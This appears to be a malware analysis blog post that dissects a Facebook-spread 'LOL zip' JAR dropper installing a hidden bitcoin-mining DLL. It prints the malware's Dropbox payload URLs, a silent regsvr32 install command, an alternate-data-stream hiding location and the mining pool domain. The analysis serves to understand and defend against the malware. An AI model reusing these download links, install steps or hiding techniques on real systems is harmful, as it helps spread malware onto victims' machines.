As discussed in previous post now we will employ traditional malware analysis technique in order to dissect this new virus. Figure 2 show LOL zip virus message. Initially we have following information about this malware:
· This message is sent from victim’s computer without his knowledge to all his Facebook friends and
· Victims also reported sluggish performance of system after the infection.
Fig. 2. Facebook Message containing Malware
We will safely download this file on our virtual controlled environment to carry the further analysis. After unzipping it we found a JAR (Java Archived File) in it.
Fig. 3. JAR file inside Zipped folder
Using online available java decompiler we have converted the byte code (JAR file) to source code file.
Fig. 4. Decompiled Jar File
Decompilation and comprehension of JAR File
Source of JAR file is obfuscated so it is needed to decompile such a file. We will use simple print instruction to find out the meaning of all the functions. After analyzing each function we have following information. These operations are performed by JAR file in order to download and install the actual malware.
· Jar file creates a directory in C drive if not present, namely C:\\TEMP\\
· Jar file created file name YQJHBJX.PWY as hidden alternate stream of TEMP folder.
· Jar file then opened the http connection to location https://dl.dropboxusercontent.com/s/ +string1="f6pb6ya5e5vc0q5/d.dat?dl=1@@@21urb4zg9n2on4s/d.dat?dl=1@@@8h46y6oodr4dxxf/d.dat?dl=1@@@8opd2hw50b974mx/d.dat?dl=1@@@tix3692duv4yts9/d.dat?dl=1"
· "@@@" is splitter that means fg6oxlrzau4egd5/d.dat?dl=1 constitutes one link. Jar will be downloading something from one of these links. Jar file will try all the links in order to download the malicious DLL.
· Jar file then downloads a file named d.dat. Then the jar file copies the content of d.dat (Main malicious file) to 081C854F.dat
· final step is to run d.dat or 081C854F.dat. Lastly the Jar file installs the malicious file as a system level service using following command:
regsvr32 /s C:\\temp: 081C854F.dat (/s stands for silent install.)
Next we will use strings utility to dump out all the ASCII and UNICODE present in d.dat (DLL file) which we downloaded from the URL found above.
Fig. 5. Strings.exe Output
We found temp directory using strings utility inside the malicious DLL d.dat. This temp directory contains the Alternate Data Stream which is denoted by :rnd. So the Temp directory confirms the previous deduction.
If we go to TEMP and do "dir /r" then we can see the hidden alternate data stream. We the used tools like alternate data stream viewer to find out the contents of these alternate data streams.
Alternate data stream of TEMP folder contains 5 files as shown in figure 6
d.dat (DLL file)
Fig. 6. NTFS Alternate Streams
If rnd.dat/list file is opened after extracting alternate data stream of TEMP folder then we will find profile id of all your Facebook friends separated by comma inside it:
These Facebook profile IDs are used by the virus to further replicate to other users via Facebook. This virus replicates itself from victim account to the accounts of people in victim’s profile.
If SRV file is opened then a link to a file containing a message from the creator of this virus is found inside it: http://ideone.com/plain/74R13B
The message says virus aim is CPU mining.
The message says virus aim is CPU mining.
In order to confirm that the virus actually performs CPU mining we will dig further.
DLL (d.dat) will runs from a hidden alternate data stream. So the malicious DLL is hidden on TEMP folder alternate data stream.
Fig. 7. Strings.exe Output
By carefully going through the strings we can conclude
· Virus injects minerd mining utility in explorer.exe memory.
· Virus is registered as a service in system using a DLL file stored in alternate data stream of C:/TEMP folder.
· Attacker have used curl module to automate LOL zip message to Facebook friends of the victim.
Fig. 8. Minerd.exe Operation List
We will now run the malware sample to confirm the deductions made above. Now will look at InetSim data to confirm the hypothesis made after doing static analysis:
InetSim log shows and confirms the web address that we find as ASCII string in Malicious DLL Figure 7 below show the site(wafflepool.com) and confirm that explorer.exe is injected with minerd utility code.
Fig. 9. Wafflepool Website
Thus we can conclude form Figures 9 and 5 that explorer.exe has been injected with malicious code. Explorer does not take any command normally. Therefore the commands given to explorer in Figure 5 were able to run because of the injected minerd utility. The injection was done by LOL file in the main memory.
We concluded the following operations which are being performed by this malware sample.
· Virus injects minerd mining utility in explorer.exe memory. This executable is used for mining of bitcoins. These BitCoins can directly be redeemed for money in digital world. BitCoins is a peer to peer internet payment system in with the bitcoins serve as internet money.
· Virus is registered as a service in system using a DLL file stored in alternate data stream of C:/TEMP folder. This will ensure that the malware gets system privilege and runs automatically every time victim logs on in facebook.
· Attacker have used curl module to automate LOL zip message to Facebook friends of the victim. This ensures that as soon as a victim opens the LOL jar file, all the Facebook friends of the victim receive a copy of LOL zip file as well.
This confirms that aim of attacker is to earn BITCOINS by CPU mining which also fits with our initial information i.e. degraded CPU performance in victim’s machine.
Both the static and dynamic analysis techniques were able to uncover the details of the malware sample. Both the methods were used in conjugation with each other to confirm the findings.